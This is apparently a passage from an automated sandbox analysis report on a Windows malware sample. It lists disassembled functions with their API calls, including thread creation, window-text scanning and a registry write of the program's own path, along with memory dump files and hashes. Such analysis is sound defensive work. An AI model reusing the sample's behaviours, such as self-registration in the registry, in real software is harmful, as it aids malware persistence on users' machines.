                                                                    • VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004), ref: 004092EA
                                                                    • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040930E
                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00409320
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Virtual_ftol$AllocFreememcpy
                                                                    • String ID:
                                                                    • API String ID: 713764635-0
                                                                    • Opcode ID: bd355b47c837bbd9b55dde7494f61bf726d8b8a31d551e786866898b950f994b
                                                                    • Instruction ID: ed8a712ffc5b5e897abc6dad13cdbb477fb3aa1a293502dae122c880e4430215
                                                                    • Opcode Fuzzy Hash: bd355b47c837bbd9b55dde7494f61bf726d8b8a31d551e786866898b950f994b
                                                                    • Instruction Fuzzy Hash: 9011C471700305BBE7246F66CC86B5E7A98DB44794F10843FF945E62C2DBB89C408718
                                                                    Function 10001249 Relevance: 6.1, APIs: 4, Instructions: 66memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 10001155: _ftol.MSVCRT ref: 10001169
                                                                    • _ftol.MSVCRT ref: 1000127B
                                                                    • VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004), ref: 1000129E
                                                                    • memcpy.MSVCRT(00000000,00000000,00000000), ref: 100012C2
                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 100012D4
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Virtual_ftol$AllocFreememcpy
                                                                    • String ID:
                                                                    • API String ID: 713764635-0
                                                                    • Opcode ID: d8020b58846e36b2c0ef021d95b2744d93c70034684acec6267bbf9db4b80111
                                                                    • Instruction ID: ae797aaf9a948ef566d161c54d2cab6ded1a4e544644c1f6e6cf1d9973df26f8
                                                                    • Opcode Fuzzy Hash: d8020b58846e36b2c0ef021d95b2744d93c70034684acec6267bbf9db4b80111
                                                                    • Instruction Fuzzy Hash: A211E375700704ABF714DB65CC86BDEBAE9EF447E1F10842EF606D6284DA70A8108754
                                                                    Function 004123CF Relevance: 6.1, APIs: 4, Instructions: 60librarystringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(10012D70), ref: 004123E0
                                                                    • lstrcmpiA.KERNEL32(?,?), ref: 00412441
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00412460
                                                                    • FreeLibrary.KERNEL32(00000000), ref: 0041246B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Library$CloseFreeHandleLoadlstrcmpi
                                                                    • String ID:
                                                                    • API String ID: 2117189956-0
                                                                    • Opcode ID: 1597d119bdd4340409934fc035f21a73f1f8bbb5134f4146e10c90239e8cd71b
                                                                    • Instruction ID: b1d2a2a58fa4efb8e8d95d1ca76e0beb6e446735ff03406843662ab7cb54be78
                                                                    • Opcode Fuzzy Hash: 1597d119bdd4340409934fc035f21a73f1f8bbb5134f4146e10c90239e8cd71b
                                                                    • Instruction Fuzzy Hash: E9117331D01228BBEB119B65CD88FEFBFB8EF45751F004055F904E2240DB78EA85CA64
                                                                    Function 1000330F Relevance: 6.1, APIs: 4, Instructions: 57threadstringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • strcpy.MSVCRT(10014E04,?), ref: 1000331F
                                                                    • CreateThread.KERNEL32(00000000,00000000,10002154,00000000,00000000,00000000), ref: 1000335C
                                                                    • CloseHandle.KERNEL32(00000000), ref: 1000335F
                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_00003050,00000000,00000000,00000000), ref: 10003387
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateThread$CloseHandlestrcpy
                                                                    • String ID:
                                                                    • API String ID: 3027794524-0
                                                                    • Opcode ID: 65a164409126ecdcc5d84dcb1117f02482ac7ee385188e2975e00b1706ae25a7
                                                                    • Instruction ID: 3b4a5e44c058e12d31883cc5832a5cf70e53003bd9e5b9d04229cb0ccb599ed4
                                                                    • Opcode Fuzzy Hash: 65a164409126ecdcc5d84dcb1117f02482ac7ee385188e2975e00b1706ae25a7
                                                                    • Instruction Fuzzy Hash: 0901DBB5605259AFF700DF69DCC4C9B7BECEB492E87128036F904D7225DA34DD808BA0
                                                                    Function 10003312 Relevance: 6.1, APIs: 4, Instructions: 54threadstringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • strcpy.MSVCRT(10014E04,?), ref: 1000331F
                                                                    • CreateThread.KERNEL32(00000000,00000000,10002154,00000000,00000000,00000000), ref: 1000335C
                                                                    • CloseHandle.KERNEL32(00000000), ref: 1000335F
                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_00003050,00000000,00000000,00000000), ref: 10003387
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateThread$CloseHandlestrcpy
                                                                    • String ID:
                                                                    • API String ID: 3027794524-0
                                                                    • Opcode ID: 935de12c3884e030f0c6067258176b32390a294feaa5fd53b1ff34555a16aa78
                                                                    • Instruction ID: 5a740cae9051c5789e01d529072efcaaec96b2ae735acb36f2d1613ba77a2bd6
                                                                    • Opcode Fuzzy Hash: 935de12c3884e030f0c6067258176b32390a294feaa5fd53b1ff34555a16aa78
                                                                    • Instruction Fuzzy Hash: 79010CB5505259BFF700DF68DCC4C9B7BECEB492E8712802AF904D7225DA34DD808BA0
                                                                    Function 10003BA5 Relevance: 6.1, APIs: 4, Instructions: 52threadstringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • strcpy.MSVCRT(10014E04,?), ref: 10003BB5
                                                                    • CreateThread.KERNEL32(00000000,00000000,10002154,00000000,00000000,00000000), ref: 10003BE2
                                                                    • CloseHandle.KERNEL32(00000000), ref: 10003BE5
                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_000038D9,00000000,00000000,00000000), ref: 10003C0B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateThread$CloseHandlestrcpy
                                                                    • String ID:
                                                                    • API String ID: 3027794524-0
                                                                    • Opcode ID: de554cc3106f12f13f48865c63481c8dce2056c240203bdb69b24114600269ac
                                                                    • Instruction ID: 8a595a9359ace313486d68bf63f064f2dbf0705f10ba0b366fc4a4c6b6156981
                                                                    • Opcode Fuzzy Hash: de554cc3106f12f13f48865c63481c8dce2056c240203bdb69b24114600269ac
                                                                    • Instruction Fuzzy Hash: BC01E8B5605259BEF7009F68DDC0CAB7B9CEB852E87128576FA04D6225DA31DC848BB0
                                                                    Function 10002FD9 Relevance: 6.1, APIs: 4, Instructions: 52threadstringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • strcpy.MSVCRT(10014E04,?), ref: 10002FE9
                                                                    • CreateThread.KERNEL32(00000000,00000000,10002154,00000000,00000000,00000000), ref: 10003016
                                                                    • CloseHandle.KERNEL32(00000000), ref: 10003019
                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_00002DAB,00000000,00000000,00000000), ref: 1000303F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateThread$CloseHandlestrcpy
                                                                    • String ID:
                                                                    • API String ID: 3027794524-0
                                                                    • Opcode ID: 3d460dcf4820d85662d129f0b962bba6f95952237c51b4056d27ef57a1556d13
                                                                    • Instruction ID: a4c7ccd63960f261a876490d46d9b0fe0f61bc29c67e8ed61f9ccbef9d70629c
                                                                    • Opcode Fuzzy Hash: 3d460dcf4820d85662d129f0b962bba6f95952237c51b4056d27ef57a1556d13
                                                                    • Instruction Fuzzy Hash: BC01FFB550525D7EF700DF64DCC4CAB7B9CEB852E87114536FA0496225D634DD848670
                                                                    Function 0040D81C Relevance: 6.1, APIs: 4, Instructions: 51stringwindowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • IsWindowVisible.USER32(?), ref: 0040D828
                                                                    • SendMessageA.USER32(?,0000000D,00000400,00000000), ref: 0040D85D
                                                                    • lstrlen.KERNEL32(00000000), ref: 0040D86A
                                                                    • strstr.MSVCRT ref: 0040D88E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: MessageSendVisibleWindowlstrlenstrstr
                                                                    • String ID:
                                                                    • API String ID: 2582741326-0
                                                                    • Opcode ID: 41c15ac8a034a4f988a901adb0276dad7d493b2f6438a95bce7c2869373d5829
                                                                    • Instruction ID: d235481b9b92231afd6427172e1103f9c0cec4a32e5d7be8947e76bf447d6a07
                                                                    • Opcode Fuzzy Hash: 41c15ac8a034a4f988a901adb0276dad7d493b2f6438a95bce7c2869373d5829
                                                                    • Instruction Fuzzy Hash: 86017572A04229AEFB107BA4DC49FA67BACEF04344F148477E705F50D0DBB9A9458F58
                                                                    Function 100048E9 Relevance: 6.1, APIs: 4, Instructions: 51threadstringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • strcpy.MSVCRT(10014E04,?), ref: 100048F8
                                                                    • CreateThread.KERNEL32(00000000,00000000,10002154,00000000,00000000,00000000), ref: 10004925
                                                                    • CloseHandle.KERNEL32(00000000), ref: 10004928
                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_000047B2,00000000,00000000,00000000), ref: 1000494E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateThread$CloseHandlestrcpy
                                                                    • String ID:
                                                                    • API String ID: 3027794524-0
                                                                    • Opcode ID: fa757a253a8fb56487e7ab44d92704aef3d27e44b58d9174f499b71298464214
                                                                    • Instruction ID: f54ba1f4d68c54ff34d6b46a82bcb8a2118237904e40f0b8388af11fa433a658
                                                                    • Opcode Fuzzy Hash: fa757a253a8fb56487e7ab44d92704aef3d27e44b58d9174f499b71298464214
                                                                    • Instruction Fuzzy Hash: 660128B5505259BEF7009F69DCC4CAB7B9CEB852E83124036FA0496225CA30DC808AA0
                                                                    Function 100048EB Relevance: 6.0, APIs: 4, Instructions: 49threadstringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • strcpy.MSVCRT(10014E04,?), ref: 100048F8
                                                                    • CreateThread.KERNEL32(00000000,00000000,10002154,00000000,00000000,00000000), ref: 10004925
                                                                    • CloseHandle.KERNEL32(00000000), ref: 10004928
                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_000047B2,00000000,00000000,00000000), ref: 1000494E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateThread$CloseHandlestrcpy
                                                                    • String ID:
                                                                    • API String ID: 3027794524-0
                                                                    • Opcode ID: 984ab068ead804bdbad976fb3c11e0140bbe1b88babf3aa644fc67727f65b7f5
                                                                    • Instruction ID: 91f668e4c2e07200796a6330d9c86530fccc4c8c679d771c63903f968a300784
                                                                    • Opcode Fuzzy Hash: 984ab068ead804bdbad976fb3c11e0140bbe1b88babf3aa644fc67727f65b7f5
                                                                    • Instruction Fuzzy Hash: D40146F550525DBFF7009F64DCC0CAB7BECEB852E83124036FA0497225CA30DC808AA0
                                                                    Function 10003BA8 Relevance: 6.0, APIs: 4, Instructions: 49threadstringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • strcpy.MSVCRT(10014E04,?), ref: 10003BB5
                                                                    • CreateThread.KERNEL32(00000000,00000000,10002154,00000000,00000000,00000000), ref: 10003BE2
                                                                    • CloseHandle.KERNEL32(00000000), ref: 10003BE5
                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_000038D9,00000000,00000000,00000000), ref: 10003C0B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateThread$CloseHandlestrcpy
                                                                    • String ID:
                                                                    • API String ID: 3027794524-0
                                                                    • Opcode ID: 3cdd8863520d37c2d208e99fa3a5198f012113f8e60e02a40381e9bbe3d9f00f
                                                                    • Instruction ID: 64f11de6cb9980ccf9cb126778a316ce0da3c38ecdc3d1121efab58b0cbb8362
                                                                    • Opcode Fuzzy Hash: 3cdd8863520d37c2d208e99fa3a5198f012113f8e60e02a40381e9bbe3d9f00f
                                                                    • Instruction Fuzzy Hash: 6301F6B5505259BFF700DF68DDC0CAB7BACEB852E87128566F90496225DA31EC808BB0
                                                                    Function 10002FDC Relevance: 6.0, APIs: 4, Instructions: 49threadstringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • strcpy.MSVCRT(10014E04,?), ref: 10002FE9
                                                                    • CreateThread.KERNEL32(00000000,00000000,10002154,00000000,00000000,00000000), ref: 10003016
                                                                    • CloseHandle.KERNEL32(00000000), ref: 10003019
                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_00002DAB,00000000,00000000,00000000), ref: 1000303F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateThread$CloseHandlestrcpy
                                                                    • String ID:
                                                                    • API String ID: 3027794524-0
                                                                    • Opcode ID: 205a226a8ba8a2211124f27a9ee41849a0d46b67b8944d1ede31a6de25eb454f
                                                                    • Instruction ID: 9ef6278120636b26c595fc5a858eab384134e2c6a33bf4d69654459df797d562
                                                                    • Opcode Fuzzy Hash: 205a226a8ba8a2211124f27a9ee41849a0d46b67b8944d1ede31a6de25eb454f
                                                                    • Instruction Fuzzy Hash: 0D011DB550625DBFF700DF64DCC4CAB7BECEB852E87124526F90497225DA34DD808A70
                                                                    Function 00410BAA Relevance: 6.0, APIs: 4, Instructions: 48stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: strlen$CreateDirectory_access
                                                                    • String ID:
                                                                    • API String ID: 2692904705-0
                                                                    • Opcode ID: eca1c5be5744802d5389ec8559ced261d658f058531e2a1ef4abc33b65649ad2
                                                                    • Instruction ID: 05ceb47985c01e60b2406e648c31dabd0bec007536a162591e58ca472eb4f7b4
                                                                    • Opcode Fuzzy Hash: eca1c5be5744802d5389ec8559ced261d658f058531e2a1ef4abc33b65649ad2
                                                                    • Instruction Fuzzy Hash: AB0126B38002287BEB30A3B5DD45FCB776C8B85754F1006AAE750E2081D6F896C08A99
                                                                    Function 00411532 Relevance: 6.0, APIs: 4, Instructions: 42registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 00411563
                                                                    • RegOpenKeyExA.ADVAPI32(80000001,10013EE8,00000000,000F003F,?), ref: 0041157E
                                                                    • RegSetValueExA.ADVAPI32(?,1001321C,00000000,00000001,00000000,00000104), ref: 0041159C
                                                                    • RegCloseKey.ADVAPI32(?), ref: 004115A5
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
